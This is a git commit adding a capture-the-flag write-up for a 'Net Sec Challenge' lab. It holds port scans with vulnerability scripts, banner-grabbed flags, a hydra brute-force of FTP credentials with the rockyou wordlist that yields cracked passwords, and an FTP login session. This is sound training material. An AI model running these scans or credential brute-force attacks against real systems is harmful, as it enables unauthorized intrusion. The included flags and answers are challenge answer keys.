net sec challenge
This commit is contained in:
parent
7cc8a53f93
commit
7c2a0930a6
|
@ -0,0 +1,96 @@
|
||||||
|
# Net Sec Challenge
|
||||||
|
|
||||||
|
## Challenge Questions
|
||||||
|
|
||||||
|
I'll do a `tools/enumeration/RustScan/target/release/rustscan -a 10.10.185.143 -u 5000 -- -sC -sV --vv --script vuln` which delivers nearly all the answers to the following questions.
|
||||||
|
|
||||||
|
### What is the highest port number being open less than 10,000?
|
||||||
|
```
|
||||||
|
8080
|
||||||
|
```
|
||||||
|
|
||||||
|
### There is an open port outside the common 1000 ports; it is above 10,000. What is it?
|
||||||
|
```
|
||||||
|
10021
|
||||||
|
```
|
||||||
|
|
||||||
|
### How many TCP ports are open?
|
||||||
|
These scanned protocols on the ports are all based on TCP.
|
||||||
|
```
|
||||||
|
6
|
||||||
|
```
|
||||||
|
|
||||||
|
### What is the flag hidden in the HTTP server header?
|
||||||
|
```sh
|
||||||
|
80/tcp open http syn-ack lighttpd
|
||||||
|
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|
||||||
|
|_http-server-header: lighttpd THM{web_server_25352}
|
||||||
|
```
|
||||||
|
|
||||||
|
### What is the flag hidden in the SSH server header?
|
||||||
|
```sh
|
||||||
|
SF-Port22-TCP:V=7.92%I=7%D=10/16%Time=616A0C7A%P=x86_64-pc-linux-gnu%r(NUL
|
||||||
|
SF:L,29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");
|
||||||
|
```
|
||||||
|
```
|
||||||
|
THM{946219583339}
|
||||||
|
```
|
||||||
|
### We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
|
||||||
|
|
||||||
|
* `10021/tcp open ftp syn-ack vsftpd 3.0.3`
|
||||||
|
```
|
||||||
|
vsftp 3.0.3
|
||||||
|
```
|
||||||
|
|
||||||
|
### We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
|
||||||
|
|
||||||
|
Some bruteforcing via hydra
|
||||||
|
```sh
|
||||||
|
[whackx@manbox ~]$ hydra -L users -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ftp://10.10.185.143:10021
|
||||||
|
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||||
|
|
||||||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-16 01:35:05
|
||||||
|
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
|
||||||
|
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
|
||||||
|
[DATA] attacking ftp://10.10.185.143:10021/
|
||||||
|
[10021][ftp] host: 10.10.185.143 login: eddie password: jordan
|
||||||
|
[10021][ftp] host: 10.10.185.143 login: quinn password: andrea
|
||||||
|
1 of 1 target successfully completed, 2 valid passwords found
|
||||||
|
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
|
||||||
|
[ERROR] 8 targets did not resolve or could not be connected
|
||||||
|
[ERROR] 0 target did not complete
|
||||||
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-16 01:35:36
|
||||||
|
```
|
||||||
|
|
||||||
|
Log in as `quinn`, download the flag via `get ftp_flag.txt`.
|
||||||
|
```
|
||||||
|
[whackx@manbox ~]$ ftp 10.10.185.143 10021
|
||||||
|
Connected to 10.10.185.143.
|
||||||
|
220 (vsFTPd 3.0.3)
|
||||||
|
Name (10.10.185.143:whackx): quinn
|
||||||
|
331 Please specify the password.
|
||||||
|
Password:
|
||||||
|
230 Login successful.
|
||||||
|
Remote system type is UNIX.
|
||||||
|
Using binary mode to transfer files.
|
||||||
|
ftp> ls -la
|
||||||
|
200 PORT command successful. Consider using PASV.
|
||||||
|
150 Here comes the directory listing.
|
||||||
|
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 .
|
||||||
|
drwxr-xr-x 2 1002 1002 4096 Sep 20 08:36 ..
|
||||||
|
-rw-r--r-- 1 1002 1002 220 Sep 14 07:43 .bash_logout
|
||||||
|
-rw-r--r-- 1 1002 1002 3771 Sep 14 07:43 .bashrc
|
||||||
|
-rw-r--r-- 1 1002 1002 807 Sep 14 07:43 .profile
|
||||||
|
-rw------- 1 1002 1002 723 Sep 20 08:27 .viminfo
|
||||||
|
-rw-rw-r-- 1 1002 1002 18 Sep 20 08:27 ftp_flag.txt
|
||||||
|
226 Directory send OK.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Browsing to http://10.10.185.143:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
|
||||||
|
|
||||||
|
At first, I tried to be stealthy with something like the following.
|
||||||
|
```sh
|
||||||
|
[whackx@manbox ~]$ sudo nmap -T1 -sN -ff 10.10.185.143 -vv
|
||||||
|
```
|
||||||
|
That did not not work. So, I spun up an attack box and iterated through every flag possible.
|
||||||
|
At some point the flag came up on the website.
|
Loading…
Reference in New Issue